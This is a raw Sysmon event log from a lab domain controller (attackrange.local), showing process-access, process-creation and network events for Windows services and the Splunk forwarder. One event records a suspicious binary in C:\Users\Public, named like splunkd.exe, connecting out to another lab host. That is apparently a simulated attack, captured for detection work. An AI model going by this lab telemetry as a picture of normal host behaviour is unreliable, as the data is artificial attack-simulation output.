Files\Amazon\SSM\amazon-ssm-agent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\services.exe+3332|C:\Windows\system32\services.exe+6334|C:\Windows\system32\services.exe+dc24|C:\Windows\system32\services.exe+d248|C:\Windows\system32\services.exe+220e1|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000001282Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:14.840{59A5CD1D-8E56-6005-2D00-00000000A301}2220C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe-----"C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=D6503F8DC5DAD508A400E650EF5F4DB8,SHA256=E5008CA6E01D09A81572573769CDE57ED0BA3349956376AC1D022D0CED16C79F,IMPHASH=1CD364A9E949D5ECEBD6C614E64BC545{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\System32\services.exeC:\Windows\system32\services.exe 10341000x80000000000000001281Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.075{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-8E57-6005-3400-00000000A301}3156C:\Windows\System32\vdsldr.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001280Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.075{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E57-6005-3400-00000000A301}3156C:\Windows\System32\vdsldr.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000001279Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.075{59A5CD1D-8E57-6005-3400-00000000A301}3156C:\Windows\System32\vdsldr.exe10.0.14393.4169 (rs1_release.210107-1130)Virtual Disk Service LoaderMicrosoft® Windows® Operating SystemMicrosoft Corporationvdsldr.exeC:\Windows\System32\vdsldr.exe -EmbeddingC:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=B344B812DD6C294360563E52B2EF1C13,SHA256=0A4CA31848D7513F97F72D0292F5BBEE1CA409AAFFCACDE5369E12003B34118D,IMPHASH=D6207B24445355CEA1AC6C8E9A2BA2B9{59A5CD1D-8E46-6005-0C00-00000000A301}596C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 10341000x80000000000000001929Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:17.908{59A5CD1D-8E59-6005-4C00-00000000A301}40844088C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE{59A5CD1D-8E56-6005-3000-00000000A301}2532C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e675|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e1a6|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f344c|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f2a91|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+19fdb50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x80000000000000001928Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localUsermode2021-01-18 13:34:15.234{59A5CD1D-8E4A-6005-2300-00000000A301}2916C:\Users\Public\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-495.attackrange.local49684-false10.0.1.12-7010- 10341000x80000000000000001927Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:17.736{59A5CD1D-8E44-6005-0B00-00000000A301}856988C:\Windows\system32\lsass.exe{59A5CD1D-8E56-6005-2F00-00000000A301}2276C:\Windows\system32\DFSRs.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001926Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:17.736{59A5CD1D-8E44-6005-0B00-00000000A301}856988C:\Windows\system32\lsass.exe{59A5CD1D-8E56-6005-2F00-00000000A301}2276C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001925Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:17.658{59A5CD1D-8E58-6005-3A00-00000000A301}36643684C:\Windows\system32\conhost.exe{59A5CD1D-8E59-6005-4C00-00000000A301}4084C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001924Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:17.658{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001923Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:17.658{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001922Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:17.658{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001921Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:17.658{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001920Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:17.658{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001919Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:17.658{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001918Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:17.658{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001917Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:17.658{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001916Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:17.658{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-8E59-6005-4C00-00000000A301}4084C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001915Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:17.658{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001914Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:17.658{59A5CD1D-8E59-6005-4B00-00000000A301}40644068C:\Program Files\SplunkUniversalForwarder\bin\btool.exe{59A5CD1D-8E59-6005-4C00-00000000A301}4084C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+239c|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2568|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2926|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+11cf|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+1245|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+aa24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000001913Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:17.669{59A5CD1D-8E59-6005-4C00-00000000A301}4084C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" btool check --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{59A5CD1D-8E59-6005-4B00-00000000A301}4064C:\Program Files\SplunkUniversalForwarder\bin\btool.exe"C:\Program Files\SplunkUniversalForwarder\bin\btool" check --no-log 10341000x80000000000000001912Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:17.658{59A5CD1D-8E58-6005-3A00-00000000A301}36643684C:\Windows\system32\conhost.exe{59A5CD1D-8E59-6005-4B00-00000000A301}4064C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001911Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:17.658{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001910Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:17.658{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001909Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:17.658{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001908Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:17.658{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001907Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:17.658{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001906Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 